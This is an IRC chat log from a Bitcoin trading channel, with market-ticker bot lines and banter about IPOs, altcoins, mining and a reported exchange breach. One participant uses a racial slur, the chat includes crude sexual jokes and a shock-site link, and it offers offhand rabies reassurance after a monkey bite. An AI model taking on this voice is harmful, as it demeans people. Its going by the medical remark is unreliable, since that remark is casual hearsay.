[ASICM] 500 @ 0.0248 = 12.4 BTC [-] Jun 11 02:35:35 !ticker m s.mg Jun 11 02:35:36 [MPEX:S.MG] 1D: 0.0001 / 0.0001 / 0.00010011 (6010050 shares, 601.03 BTC), 7D: 0.0001 / 0.00010007 / 0.00010555 (88096605 shares, 8,816.70 BTC), 30D: 0.0001 / 0.00010007 / 0.00010555 (88096605 shares, 8,816.70 BTC) Jun 11 02:35:43 [HAVELOCK] [ASICM] 188 @ 0.0248 = 4.6624 BTC [-] Jun 11 02:35:49 [BTCTC] [S.DICE-PT] 20 @ 0.002406 = 0.0481 BTC [-] Jun 11 02:35:51 [BTCTC] [S.DICE-PT] 13 @ 0.002405 = 0.0313 BTC [-] Jun 11 02:36:10 ;;calc 8816*[ticker --last] Jun 11 02:36:12 934496 Jun 11 02:36:28 one mirrion dorrah ipo Jun 11 02:36:42 so guys Jun 11 02:36:47 how does one get on silk road ? Jun 11 02:37:08 [BTCTC] [S.MPOE-PT] 40 @ 0.000683 = 0.0273 BTC [-] Jun 11 02:37:19 you're going to have a $1mn free crack party? Jun 11 02:37:20 [BTCTC] [S.MPOE-PT] 43 @ 0.000682 = 0.0293 BTC [-] Jun 11 02:37:24 [BTCTC] [S.MPOE-PT] 488 @ 0.00068 = 0.3318 BTC [-] Jun 11 02:38:17 you mean crack as in snatch or crack as in teh white lady ? Jun 11 02:38:23 [BTCTC] [S.MPOE-PT] 45 @ 0.000677 = 0.0305 BTC [-] Jun 11 02:38:25 [BTCTC] [S.MPOE-PT] 50 @ 0.00067 = 0.0335 BTC [-] Jun 11 02:38:26 [BTCTC] [S.MPOE-PT] 20 @ 0.000666 = 0.0133 BTC [-] Jun 11 02:38:28 [BTCTC] [S.MPOE-PT] 14 @ 0.000663 = 0.0093 BTC [-] Jun 11 02:39:03 crack as in rocks Jun 11 02:39:43 [MPEX] [S.MPOE] 5000 @ 0.00072334 = 3.6167 BTC [-] Jun 11 02:40:07 [MPEX] [S.MPOE] 4321 @ 0.00072333 = 3.1255 BTC [-] Jun 11 02:40:10 [MPEX] [S.MPOE] 1484 @ 0.00072332 = 1.0734 BTC [-] Jun 11 02:40:12 [MPEX] [S.MPOE] 1867 @ 0.00072331 = 1.3504 BTC [-] Jun 11 02:41:49 mircea_popescu: you need to watch all episodes of chappelle show statte Jun 11 02:41:55 meh Jun 11 02:41:57 best TV ever Jun 11 02:43:36 let he who is without sin cast the first rock Jun 11 02:43:40 and I shall smoketh it Jun 11 02:43:54 i kinda don't go for the entire junkie culture. Jun 11 02:46:06 sample (no drug refs): https://www.youtube.com/watch?v=-I7JJChM6IQ Jun 11 02:46:21 also relevant to your blog Jun 11 02:46:51 of course Jun 11 02:47:19 read all the blogs Jun 11 02:47:52 kay, let's see here Jun 11 02:47:58 [BTCTC] [MININGCO.ETF] 1 @ 0.7 BTC [-] Jun 11 02:49:06 yeah but you're from finland Jun 11 02:51:18 [BTCTC] [DMS.PURCHASE] 26 @ 0.065258 = 1.6967 BTC Jun 11 02:53:50 [HAVELOCK] [ASICM] 50 @ 0.0246 = 1.23 BTC [-] Jun 11 02:56:58 What, mine isn't good enough? Jun 11 02:58:59 Bah, make like the sheppard... Jun 11 02:59:27 *shepherd Jun 11 03:00:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.024983 = 0.0749 BTC [+] Jun 11 03:00:32 [HAVELOCK] [ASICM] 119 @ 0.02494999 = 2.969 BTC [+] Jun 11 03:00:42 dub not bad Jun 11 03:00:55 more like a well done anthropology term paper than a comedy routine Jun 11 03:01:01 or maybe i'm not just american enough. Jun 11 03:01:03 [HAVELOCK] [ASICM] 562 @ 0.02495 = 14.0219 BTC [+] Jun 11 03:01:57 [BTCTC] [DMS.SELLING] 1 @ 0.0387 BTC [-] Jun 11 03:06:12 [BTCTC] [ASICMINER-PT] 1 @ 2.479999 BTC [+] Jun 11 03:06:16 [BTCTC] [ASICMINER-PT] 2 @ 2.48 = 4.96 BTC [+] Jun 11 03:15:22 [BTCTC] [DMS.PURCHASE] 220 @ 0.065258 = 14.3568 BTC Jun 11 03:21:42 [MPEX] [S.DICE] 5000 @ 0.00241999 = 12.1 BTC [-] Jun 11 03:22:27 S.DICE made 1000 BTC today. Jun 11 03:30:46 !t m s.mg Jun 11 03:30:47 [MPEX:S.MG] 1D: 0.0001 / 0.0001 / 0.00010011 (6010050 shares, 601.03 BTC), 7D: 0.0001 / 0.00010007 / 0.00010555 (88096605 shares, 8,816.70 BTC), 30D: 0.0001 / 0.00010007 / 0.00010555 (88096605 shares, 8,816.70 BTC) Jun 11 03:31:41 [BTCTC] [TAT.ASICMINER] 13 @ 0.024983 = 0.3248 BTC [+] Jun 11 03:32:43 [BTCTC] [TAT.ASICMINER] 16 @ 0.024985 = 0.3998 BTC [+] Jun 11 03:35:00 [BTCTC] [BITVPS] 2 @ 0.000653 = 0.0013 BTC [-] Jun 11 03:35:19 [BTCTC] [BITVPS] 2 @ 0.000652 = 0.0013 BTC [-] Jun 11 03:35:38 [HAVELOCK] [ASICM] 176 @ 0.02494998 = 4.3912 BTC [-] Jun 11 03:35:39 [HAVELOCK] [ASICM] 77 @ 0.02494999 = 1.9211 BTC [+] Jun 11 03:37:53 [HAVELOCK] [ASICM] 41 @ 0.02451012 = 1.0049 BTC [-] Jun 11 03:42:38 just peeked in #bitcoin for the first time in months Jun 11 03:42:45 what in the everloving fuck Jun 11 03:43:07 [MPEX] [S.MPOE] 2700 @ 0.00072493 = 1.9573 BTC [+] Jun 11 03:43:39 i got a disease last time i went in there Jun 11 03:46:29 [HAVELOCK] [ASICM] 223 @ 0.02494999 = 5.5638 BTC [+] Jun 11 03:46:31 [HAVELOCK] [ASICM] 38 @ 0.02495 = 0.9481 BTC [+] Jun 11 03:46:32 [HAVELOCK] [ASICM] 46 @ 0.024999 = 1.15 BTC [+] Jun 11 03:48:11 [HAVELOCK] [ASICM] 480 @ 0.02498 = 11.9904 BTC [-] Jun 11 03:49:09 [HAVELOCK] [ASICM] 13 @ 0.02498 = 0.3247 BTC [-] Jun 11 03:53:27 [BTCTC] [ASICMINER-PT] 1 @ 2.4888 BTC [+] Jun 11 03:53:28 [BTCTC] [S.MPOE-PT] 10 @ 0.00071 = 0.0071 BTC [+] Jun 11 03:53:30 [BTCTC] [ASICMINER-PT] 1 @ 2.4889 BTC [+] Jun 11 03:57:04 [19:43] i got a disease last time i went in there <-- added to bitcoin quotes. :P Jun 11 03:58:23 [MPEX] [S.MPOE] 4650 @ 0.00072463 = 3.3695 BTC [-] Jun 11 03:58:25 [MPEX] [S.MPOE] 4321 @ 0.00072996 = 3.1542 BTC [+] Jun 11 03:58:36 [MPEX] [S.MPOE] 11979 @ 0.0007303 = 8.7483 BTC [+] Jun 11 03:58:59 [BTCTC] [DMS.MINING] 20 @ 0.032999 = 0.66 BTC [-] Jun 11 04:03:52 truff1es: lemonparty.org Jun 11 04:13:04 [BTCTC] [DMS.SELLING] 1 @ 0.036011 BTC [-] Jun 11 04:13:52 [BTCTC] [DMS.MINING] 25 @ 0.03 = 0.75 BTC [-] Jun 11 04:14:31 http://trilema.com/2013/smg-ipo-succeeded-other-statements/ Jun 11 04:16:34 [HAVELOCK] [ASICM] 200 @ 0.02498 = 4.996 BTC [-] Jun 11 04:16:44 [BTCTC] [DMS.MINING] 1 @ 0.02342 BTC [-] Jun 11 04:16:46 [BTCTC] [DMS.MINING] 25 @ 0.02341 = 0.5853 BTC [-] Jun 11 04:19:27 [BTCTC] [DMS.SELLING] 1 @ 0.041986 BTC [+] Jun 11 04:19:29 [BTCTC] [DMS.SELLING] 2 @ 0.041987 = 0.084 BTC [+] Jun 11 04:19:30 [BTCTC] [DMS.SELLING] 17 @ 0.042 = 0.714 BTC [+] Jun 11 04:23:09 [BTCTC] [DMS.PURCHASE] 20 @ 0.065258 = 1.3052 BTC Jun 11 04:25:28 https://bitcointalk.org/index.php?topic=133147.msg2435312#msg2435312 Jun 11 04:25:32 jesus god check that out. Jun 11 04:27:01 lmao no wonder why..cakephp Jun 11 04:27:03 lmao Jun 11 04:27:20 these people ;/ Jun 11 04:27:30 the girl bitchslaps them all to hell, she's the villain Jun 11 04:27:41 then a few months later... o hai guise, we were wide open lolkthx Jun 11 04:28:50 PicoStocks.com, High-tech startup fundraising, evaluation and profit sharing Jun 11 04:29:07 too bad darwin cant selectively take out tech "geniuses" that put up sites and businesses in such a way Jun 11 04:29:11 The intruder was able to overwrite the passwords of other users Jun 11 04:29:31 this is le very very hick teque Jun 11 04:29:37 or however you speal it. Jun 11 04:29:41 Bitcointalk people sometimes amaze me. Jun 11 04:29:57 Got a dude to send me 0.1 BTC to tell him how to add the genesis coinbase to the tx hash so its spendable. Jun 11 04:30:01 Finally he manages to do it. Jun 11 04:30:04 Then I get this: Jun 11 04:30:20 Well I finally got the genesis block coins to be spendable. Now the problem is, they never confirm! Jun 11 04:30:20 Got some more BTC for you if you can provide a fix Jun 11 04:30:28 wait Jun 11 04:30:30 Prior 2 lines should be in quotes. Jun 11 04:30:40 wait wait. he wants to spend block 1 btc ? Jun 11 04:30:47 Does he think I'm Satoshi or sthg? Or that the whole network has upgraded? I don't understand some people. Jun 11 04:31:57 He wanted to know how to get them in the tx hash (Satoshi never put them there) so that they're theoretically spendable. Jun 11 04:32:16 Point is, only Satoshi has the key, and the whole network won't accept it as it's not in the tx-hash network wide. Jun 11 04:32:33 right. Jun 11 04:33:12 well, if you figure out how to do it i got some btc too :D Jun 11 04:33:21 I'd have some too :) Jun 11 04:33:24 Chaaaang-Noi: Thx for the 500 link. I own one of those addresses! Not gonna say which though. Jun 11 04:34:28 I wonder if $100m is stealable money is incentivizing anyone to try and crack ECDSA (the old coinbases are stealable, as are addresses with non-zero balance that have been spent from at least once). Jun 11 04:34:33 s/is/in/ Jun 11 04:35:27 Neil i remember someone showing an easy exploit for addresses which made two spends on the same seed for ecdsa Jun 11 04:35:33 If BTC ever gets to $1k or $5k, and those remain unstolen, I think it's pretty convincing proof that ECDSA hasn't been cracked by any intelligence agency. Jun 11 04:35:37 and by easy i mean "you can do it by hand" Jun 11 04:36:03 tbh i think it's convincing proof as it is. most agencies wouldn't sneer at a few mn extra budget. Jun 11 04:36:18 Two spends on the same seed? What does that mean? If you can do the public->private step, then there's a lot of money for the taking right now. Jun 11 04:36:45 the ecdsa needs to have a good seed or else it doesn't work Jun 11 04:36:47 [MPEX] [S.MPOE] 4321 @ 0.00072357 = 3.1265 BTC [-] Jun 11 04:36:47 let me find the article Jun 11 04:37:04 [MPEX] [S.MPOE] 1029 @ 0.00072259 = 0.7435 BTC [-] Jun 11 04:37:05 [MPEX] [S.MPOE] 271 @ 0.00072258 = 0.1958 BTC [-] Jun 11 04:37:05 Oh I see, please, that'd be interesting. You mean the G point? Jun 11 04:37:08 I hate medicine Jun 11 04:37:14 G spot. Heh. Jun 11 04:37:21 can't get a straight answer on this rabies thing Jun 11 04:37:42 I get bit by a wild monkey in indochina Jun 11 04:37:59 doctor says nothign to worry about unless there is an infection at the site Jun 11 04:38:10 http://www.nilsschneider.net/2013/01/28/recovering-bitcoin-private-keys.html Jun 11 04:38:15 every bit of internet says if there is an infection you are already dead Jun 11 04:38:29 dub you're fine. Jun 11 04:38:39 mircea_popescu: If they steal it now though they'd be giving away the chance to wait until it gets more valuable, and steal more. Jun 11 04:38:49 they'd steal less btc, not more. Jun 11 04:39:07 ear Jun 11 04:39:35 most of it Jun 11 04:39:46 what were you doing playing weith monkeys Jun 11 04:39:57 being a stupid tourist Jun 11 04:40:21 mircea_popescu: Ah I see, that's a weakness in the signatures. Yeah. I'm not a fan of spending an address other than all in one go. Jun 11 04:40:46 mpex address would be vulnerable if you were using a crappy implementation Jun 11 04:41:36 well this is where the untested/prototype/new stuff comes in Jun 11 04:41:41 fuck knows what's crappy. Jun 11 04:41:42 still, with 100% fatality rate it seems like a second opinion might be in order Jun 11 04:42:01 dub rabies is an area sort of thing. if the local doctor says no concern he's likely right. Jun 11 04:42:10 or do you mean you asked a doctor in the us ? Jun 11 04:42:28 doctor from home, he called the CDC equiv to check Jun 11 04:42:39 hm Jun 11 04:43:01 fuck going to a local doctor, they'd just make an offering to ward off rabies spirit Jun 11 04:43:07 [BTCTC] [PAJKA.BOND] 3 @ 0.089998 = 0.27 BTC [-] Jun 11 04:43:10 not rly, but anyway. Jun 11 04:43:14 so go get the shots, they Jun 11 04:43:16 're inexpensive. Jun 11 04:43:30 rly, locals are plain dumb as fuck Jun 11 04:43:42 if they were they'd be all dead of rabies Jun 11 04:43:55 which i guess would make for a nice zombie safari. Jun 11 04:44:01 [BTCTC] [TAT.VIRTUALMINE] 129 @ 0.00777 = 1.0023 BTC [+] Jun 11 04:44:17 Neil anyway, i imagine 1dice addies would be more interesting if indeed that;s vulnerable Jun 11 04:44:24 they get maybe 10`000x as many spends sent out. Jun 11 04:46:21 [BTCTC] [ASICMINER-PT] 2 @ 2.488899 = 4.9778 BTC [-] Jun 11 04:47:57 [BTCTC] [TAT.ASICMINER] 29 @ 0.024985 = 0.7246 BTC [+] Jun 11 04:48:05 [BTCTC] [TAT.ASICMINER] 6 @ 0.025033 = 0.1502 BTC [+] Jun 11 04:48:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.025033 = 0.0501 BTC [+] Jun 11 04:49:16 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.0077 = 0.154 BTC [-] Jun 11 04:51:55 [BTCTC] [DMS.PURCHASE] 100 @ 0.065258 = 6.5258 BTC Jun 11 04:52:33 meanwhile in india... http://www.ibtimes.co.uk/articles/476720/20130610/virginity-pregnancy-testing-mass-marriage-ceremony-india.htm Jun 11 04:52:44 [BTCTC] [DMS.PURCHASE] 100 @ 0.065258 = 6.5258 BTC Jun 11 04:53:44 The Mukhyamantri Kanyadan Yojna ceremony is paid for by the government and helps women from poor families to marry. It provides brides with household items to the value of 9,000Rs (£100). Jun 11 04:56:44 Size 1337 (bytes) lol Jun 11 04:57:27 [BTCTC] [DMS.PURCHASE] 20 @ 0.065258 = 1.3052 BTC Jun 11 05:24:49 mircea_popescu: sounds like a cunty job Jun 11 05:24:58 instantrimshot.com Jun 11 05:26:42 [BTCTC] [S.DICE-PT] 5 @ 0.002409 = 0.012 BTC [+] Jun 11 05:26:47 [BTCTC] [GSDPT] 5 @ 0.0027 = 0.0135 BTC [+] Jun 11 05:31:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.025034 BTC [+] Jun 11 05:35:02 [BTCTC] [DMS.PURCHASE] 900 @ 0.065258 = 58.7322 BTC Jun 11 05:35:06 Chaaaang-Noi: hehe Jun 11 05:35:21 [BTCTC] [PAJKA.BOND] 2 @ 0.074501 = 0.149 BTC [-] Jun 11 05:36:22 "I have given the orders to probe the complaints" <- Bad choice of words... Jun 11 05:39:07 [BTCTC] [ASICMINER-PT] 2 @ 2.48881 = 4.9776 BTC [-] Jun 11 05:39:09 [BTCTC] [ASICMINER-PT] 1 @ 2.488899 BTC [+] Jun 11 05:39:11 [BTCTC] [ASICMINER-PT] 2 @ 2.4889 = 4.9778 BTC [+] Jun 11 05:39:17 [BTCTC] [ASICMINER-PT] 18 @ 2.489 = 44.802 BTC [+] Jun 11 05:39:36 [BTCTC] [TAT.VIRTUALMINE] 41 @ 0.00777 = 0.3186 BTC [+] Jun 11 05:41:07 shoulda guessed; dude asking about the genesis block and making it spendable is doing his own. In other words, another scam coin is coming! And he's still asking questions; totally clueless. Jun 11 05:48:46 [BTCTC] [TAT.ASICMINER] 60 @ 0.025034 = 1.502 BTC [+] Jun 11 05:49:59 Neil people want money more than they want clues. Jun 11 05:50:50 I charged him another 0.1 BTC to tell him why his coin won't confirm... he doesn't know the 100 confirm rule. Sheesh. And he's trying to do his own! Jun 11 05:50:58 I'm going to put my price up next time. Jun 11 05:55:15 Well it's this dude. Jun 11 05:55:16 https://bitcointalk.org/index.php?action=profile;u=101773 Jun 11 05:55:53 Oh dear, I've just found this thread: Jun 11 05:55:54 https://bitcointalk.org/index.php?topic=231202.msg2435575#msg2435575 Jun 11 06:00:05 "Made me a custom altcoin. Made it fast and looks pretty awesome. thanks!" LOL, he has no idea what he's doing. Jun 11 06:03:53 Chaaaang-Noi: Got any RIPple? I've sold almost all mine now; got 6 BTC out of it; still have a couple of k RIPple left. Jun 11 06:04:25 Not sure I believe in it; and there seems to be billions waiting to be dumped in the future. Jun 11 06:04:41 $600 for a forum account isn't bad. Jun 11 06:07:05 Well you can claim your 40k and covert it to about 7-8 BTC if you can be bothered. Jun 11 06:07:32 Anyone with an old forum a/c. Let me find the thread, hold on. Jun 11 06:07:45 it's down to 1k now... Jun 11 06:07:56 [HAVELOCK] [ASICM] 2 @ 0.02497999 = 0.05 BTC [-] Jun 11 06:08:00 https://bitcointalk.org/index.php?topic=145506.0 Jun 11 06:08:16 Oh they're only giving out 1k? Sheesh. Jun 11 06:08:27 Sorry didn't know it'd changed. Jun 11 06:08:28 started at 50k, though i only got 40k myself too Jun 11 06:10:00 Might nice of you Jun 11 06:10:01 r3qCkFe9kiGvJ6V4nDzMDioh4VykBTWH2c Jun 11 06:10:11 Wonder if they'll notice it's already been used... Jun 11 06:10:19 Can't find a way to generate a 2nd one. Jun 11 06:10:56 lol! Jun 11 06:11:21 I guess they've been pegging the giveaway size to the market price of XRP Jun 11 06:11:39 Wonder how they intend to give away the remaining 50 billion Jun 11 06:14:21 ftc will probably explode right? Jun 11 06:15:23 it's not worth an explosion, just a hardly noticeably fizzle Jun 11 06:15:50 that's funny they only give 1k now Jun 11 06:16:46 Bunnyh: Did you sell yours? Or holding them? Jun 11 06:17:24 [BTCTC] [ASICMINER-PT] 3 @ 2.499 = 7.497 BTC [+] Jun 11 06:18:55 Neil: sold, i don't have the balls to hold altcoins Jun 11 06:19:41 i have no idea how they are valued. not saying that it's much different with btc :) Jun 11 06:21:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.025034 = 0.1001 BTC [+] Jun 11 06:21:46 I think you mean "have too much brains" Jun 11 06:22:07 What's this picostocks thing hacked through PHP? Unbelievable. A cool 100k. Jun 11 06:22:22 Guy seems unfazed by it Jun 11 06:22:40 Apparently, if you believe the dude, and he didn't just send everything to a personal address Jun 11 06:23:41 https://bitcointalk.org/index.php?topic=133147.msg2432036#msg2432036 Jun 11 06:24:32 Kbowing PHP hacks and weaknesses in other such stuff has never been so profitable Jun 11 06:25:35 Chaaaang-Noi: More info - this new scamcoin is litecoin-based. Jun 11 06:28:36 Block creation has really slowed; I guess I'm gonna lose my difficulty bet :( Jun 11 06:34:16 Guy seems unfazed by it << that guy is just making shit up basically. Jun 11 06:34:32 he had however many chips supposedly on order with basic when that popped. Jun 11 06:36:29 mircea_popescu: You're saying it's suspicious; inside job? Jun 11 06:36:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.025096 = 0.0502 BTC [+] Jun 11 06:37:57 i am saying the guy is a well known liar. Jun 11 06:38:33 he's going to continue losing large imaginary sums for as long as anyone's paying any attention Jun 11 06:39:34 If he "refunds" everyone; all he's done is "buy" some credibility, assuming it's a fabrication. Jun 11 06:39:50 Pretty cheaply though. Jun 11 06:39:56 just review the history. first he had ~1.x million dollar's worth of bASIC chips on order. Jun 11 06:40:16 this was never confirmed by the basic scammer. he used this to back some sort of mining asset on his pretend-exchange. Jun 11 06:40:31 then, impredictably, basic popped. the person with a ~1.x million dollar loss was unfazed Jun 11 06:40:47 he invested about the same in something pretty much similar (bitfury). Jun 11 06:40:52 now that seems at best delayed. Jun 11 06:41:19 meanwhile, he has some breakin which he "refunds". well... there were never that many btc on his exchange thingee. as in, ever. Jun 11 06:42:14 i can't quite pin it for certain it's so small, but with reasonable confidence we're talking < 100 btc lifetime. Jun 11 06:43:45 :) Jun 11 06:44:02 after that I'm off to buy a new one Jun 11 06:44:07 [BTCTC] [TAT.ASICMINER] 52 @ 0.025096 = 1.305 BTC [+] Jun 11 06:44:46 yep -- 17" hp laptop sucks for airplanes Jun 11 06:44:58 Whatever happened to mnw's bitcoin card? Jun 11 06:45:48 Sheesh almost one year since pirate blew up Jun 11 06:46:16 I would be, but I'm stuck in Japan :( Jun 11 06:46:33 Though I decided to blow a lot of $ and time and go to porcfest next wk. Jun 11 06:47:29 Chaaaang-Noi: did you get a car so you can drive from LA? Jun 11 06:48:18 yeah! now that's a road trip Jun 11 06:48:36 Woo, big idiot sell again. Jun 11 06:49:21 No point mentioning those bats Jun 11 06:50:36 [MPEX] [S.MPOE] 4321 @ 0.00072037 = 3.1127 BTC [-] Jun 11 06:50:38 [MPEX] [S.MPOE] 9479 @ 0.00072029 = 6.8276 BTC [-] Jun 11 06:50:55 it's hard not to be bullish on ltc Jun 11 06:51:04 where are the gpu miners going? Jun 11 06:51:25 not to litecoin Jun 11 06:51:41 i've never visited the litecoin website that i know of Jun 11 06:51:47 gonna let that fad miss me Jun 11 06:52:07 jcpham: are they selling the gpus for cash? Jun 11 06:52:30 i plan to flip my gpus soon yes Jun 11 06:52:37 20 mil diff is my cutoff Jun 11 06:52:47 some of us worked out this math 2 years ago Jun 11 06:52:51 [HAVELOCK] [ASICM] 200 @ 0.02475 = 4.95 BTC [-] Jun 11 06:53:05 these asic noobs spending 50btc on blades that might mine 10btc are insane Jun 11 06:53:53 ^ what he said Jun 11 06:54:02 we're on the same page there my friend Jun 11 06:54:06 these asic noobs spending 50btc on blades that might mine 10btc are insane << actually imo it's good Jun 11 06:54:08 jcpham: no doubt the 50btc is crazy... but I'm hard pressed to believe a mass dump of gpus will occur on ebay Jun 11 06:54:08 [MPEX] [S.MPOE] 1679 @ 0.00072153 = 1.2114 BTC [+] Jun 11 06:54:12 let someone who made something useful profit Jun 11 06:54:15 rather than all the scammers. Jun 11 06:54:17 I've never understood the mining obsession. Jun 11 06:54:23 How is that a problem Chaaaang-Noi? Jun 11 06:54:46 it points out how people fail at math Jun 11 06:54:48 mircea_popescu: Indeed, we need more people making useful things. Jun 11 06:54:53 and how others profit from it Jun 11 06:55:01 and the world keeps spinning Jun 11 06:55:05 [HAVELOCK] [ASICM] 1 @ 0.02475 BTC [-] Jun 11 06:55:11 jcpham no argument, but i'd rather friedcat capitalise on that failure than the forum fauna. Jun 11 06:55:13 time is math too Jun 11 06:55:21 I'm convinced that psychologically people see it as free money, regardless of what they're paying for it. Jun 11 06:55:31 Neil old sa argument, that. Jun 11 06:55:50 i'm not criticizing any asset but kids are debating whether to drop 3btc on a usb erupter like it will ever mine it back Jun 11 06:55:53 mircea_popescu: isn't the forum fauna driving friedcat's profits? Jun 11 06:56:03 [BTCTC] [ASICMINER-PT] 1 @ 2.49899 BTC [-] Jun 11 06:56:06 [BTCTC] [ASICMINER-PT] 6 @ 2.499 = 14.994 BTC [+] Jun 11 06:56:08 optimator i meant people like the loan section. Jun 11 06:56:14 bitfinex, bitjam, bitfuckmesilly Jun 11 06:56:17 yay for the asset, fail for the person that failed to factor in time Jun 11 06:56:34 but anyways... hi guys Jun 11 06:56:46 gals and trolls Jun 11 06:56:57 no trolls here Jun 11 06:56:59 come back, 1 yr. Jun 11 06:57:22 you mean i have leave for ayear? Jun 11 06:57:32 my english is alos fails Jun 11 06:57:38 <[\\\]> jcpham: we've been trying to get rid of you for longer than that. Jun 11 06:58:02 i'll give me this, i'm persistant Jun 11 06:58:16 actually, i'll give you this : unlike dub, you have all your ear material. Jun 11 06:58:22 <[\\\]> i'm glad you've got that, because you surely don't have any coins Jun 11 06:58:37 i hate you Jun 11 06:58:42 wait, josh got scammered again ? Jun 11 06:58:50 ? Jun 11 06:58:51 no just the one time Jun 11 06:58:51 <[\\\]> Why did you buy 20k USB block erupters again? Jun 11 06:59:01 [HAVELOCK] [ASICM] 75 @ 0.02466 = 1.8495 BTC [-] Jun 11 06:59:13 <[\\\]> Chaaaang-Noi: by not pulling out fast enough. Jun 11 06:59:20 twss Jun 11 06:59:21 <[\\\]> the never ending curse of mails Jun 11 06:59:24 <[\\\]> err males* Jun 11 06:59:35 i was like 14 days away from it Jun 11 06:59:43 apparently Neil isn't in on the josh joke. hey neil, this is america. everyone born in the same decade is named the same way. currently the internet is in the decade of josh. Jun 11 06:59:43 <[\\\]> most people were Jun 11 06:59:47 <[\\\]> thats why it failed. Jun 11 06:59:48 ikr Jun 11 07:00:05 goddamn ponzis Jun 11 07:00:09 wy u no work Jun 11 07:00:12 <[\\\]> lol Jun 11 07:00:20 <[\\\]> someone needs to invent a ponzi that works. Jun 11 07:00:25 <[\\\]> for the investors. Jun 11 07:00:33 lol @save Jun 11 07:00:45 this is bitcoin. it's just a new idea/app Jun 11 07:00:45 <[\\\]> I'm like Jesus Jun 11 07:01:02 like a bitcoin bank or something Jun 11 07:01:05 <[\\\]> Im already working on the cellphone that doubles as an asicminer Jun 11 07:01:22 <[\\\]> Imma be rich Jun 11 07:01:23 wow akhan went to the dark side ?! Jun 11 07:01:33 we'd need to print our own money for the ponzi to work Jun 11 07:01:42 oh wait Jun 11 07:01:55 i almost had a thought there... Jun 11 07:01:57 <[\\\]> I thought akhan was always black Jun 11 07:02:08 <[\\\]> jcpham: invent bitcoin Jun 11 07:02:28 #546 https://bitcointalk.org/index.php?topic=229300.0 Jun 11 07:02:31 <[\\\]> I am Satoshi but I lost my GPG key Jun 11 07:02:32 hamcoin 0.2 alpha in development now Jun 11 07:02:38 PalePhoenix pankkake parseval parseval_ pgp2 pigeons pingec pizzaman1337 Populus PsychoticBoy Pucilowski Jun 11 07:02:49 [\\\] nah he used to buy coins back when i was buying coins Jun 11 07:02:53 in like 2011 Jun 11 07:06:11 <[\\\]> yeah, you used ot buy them from me Jun 11 07:06:11 i used to buy from satoshi Jun 11 07:06:11 <[\\\]> because I am satoshi Jun 11 07:06:11 <[\\\]> nothing like circular statements. Jun 11 07:06:11 but then he did a paypal chargeback Jun 11 07:06:11 I love gox. Like goat said, Gox will tell you to file a police report. Coz they know that'll shut 99.9% of people up. Jun 11 07:06:11 <[\\\]> why would he paypal chargeback if he was accepting your money? Jun 11 07:06:11 exactly Jun 11 07:06:11 <[\\\]> actually Neil, no Jun 11 07:06:11 don't question the sound logic Jun 11 07:06:11 $700 devastating loss Jun 11 07:06:11 <[\\\]> they say that because police reports don't mean shit Jun 11 07:06:11 <[\\\]> they don't even mean a crime occurred Jun 11 07:06:11 <\\\\> Ah, that's better Jun 11 07:06:11 <[\\\]> congrats Jun 11 07:06:11 <[\\\]> but mine's bigger Jun 11 07:06:11 <\\\\> lol Jun 11 07:06:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.025034 = 0.0751 BTC [-] Jun 11 07:06:11 here's the best laugh of the day http://www.gizoogle.net/tranzizzle.php?search=https%3A%2F%2Fbitcointalk.org%2Findex.php%3Ftopic%3D174620.0%3Ball&se=Go+Git+Dis+Shiznit Jun 11 07:06:11 <[---]> damnit Jun 11 07:06:11 <[III]> hee Jun 11 07:06:27 <[|||]> shit this one too Jun 11 07:06:50 <[> aww Jun 11 07:06:51 [HAVELOCK] [ASICM] 49 @ 0.02475 = 1.2128 BTC [+] Jun 11 07:07:22 I hit my limit Jun 11 07:07:26 can't change Jun 11 07:07:31 lol Jun 11 07:07:38 y u no 6969 Jun 11 07:07:41 <[\\\]> tada! Jun 11 07:07:52 <[\\\]> don't make me whip out my newest nick Jun 11 07:07:56 <[\\\]> its nice and shiney Jun 11 07:08:04 incidentally, how long till cockcoin ? Jun 11 07:08:09 this one is my favorite Jun 11 07:08:10 it ripples off the tongue Jun 11 07:08:12 <[\\\]> mircea_popescu: already excists Jun 11 07:08:18 Well we had weedcoin I think Jun 11 07:08:18 vaginacoin is already here Jun 11 07:08:19 <[\\\]> mircea_popescu: the cock ripples off your tongue Jun 11 07:08:24 so cockcoin is close Jun 11 07:08:29 <[\\\]> denialdenial: punny Jun 11 07:08:29 thats one coin jcpham would like to pump Jun 11 07:08:34 weedcoin exists Jun 11 07:08:35 lol Jun 11 07:08:38 he's pumpin' it as we speak Jun 11 07:08:39 saw that one the other day Jun 11 07:08:40 <[\\\]> nice one dub Jun 11 07:08:57 denialdenial did vrag finally make his alt chain ?! Jun 11 07:09:04 all you need is a QR code tramp stamp Jun 11 07:09:05 how do i miss all the shit. i gotta get on irc Jun 11 07:09:08 <[\\\]> vragnaroda's been MIA Jun 11 07:09:20 * vragnaroda (~vragnarod@unaffiliated/vragnaroda) has joined #trilema Jun 11 07:09:22 he joined today Jun 11 07:09:24 you're just not on the cool chans. Jun 11 07:09:24 <[\\\]> yeah Jun 11 07:09:26 <[\\\]> for how long? Jun 11 07:09:30 <[\\\]> I saw him before you did Jun 11 07:09:33 <[\\\]> I guarantee Jun 11 07:09:38 i'm a stalker but i'm not that much of a stalker Jun 11 07:09:41 <[\\\]> and I bet he said nothing in that channel Jun 11 07:09:42 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.00741 = 0.2075 BTC [-] Jun 11 07:09:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00741 BTC [-] Jun 11 07:09:46 I love sgornick. He's tracking some of it. https://bitcointalk.org/index.php?topic=229300.msg2415684#msg2415684 Jun 11 07:09:59 sgornick is pretty cool. Jun 11 07:10:16 sgornick quietly warned ponzi. he must be smart. Jun 11 07:10:26 +1 respect Jun 11 07:10:28 he's a asshat Jun 11 07:10:39 he doesn't like me because i say nigger. i don't like him because he's so unloud and unobnoxious. Jun 11 07:10:44 a working relationship. Jun 11 07:11:09 he doesnt like me because I said his buddy vlad was nobody Jun 11 07:11:16 who's vlad ? Jun 11 07:11:18 sociopathic asshats? no way! Jun 11 07:11:21 exactly Jun 11 07:11:29 no but i mean for srs. Jun 11 07:11:38 vladimir is like the bad guy from hackers Jun 11 07:11:40 some russian scammer that did a shitty magazine Jun 11 07:11:40 vlad is like romanian for josh Jun 11 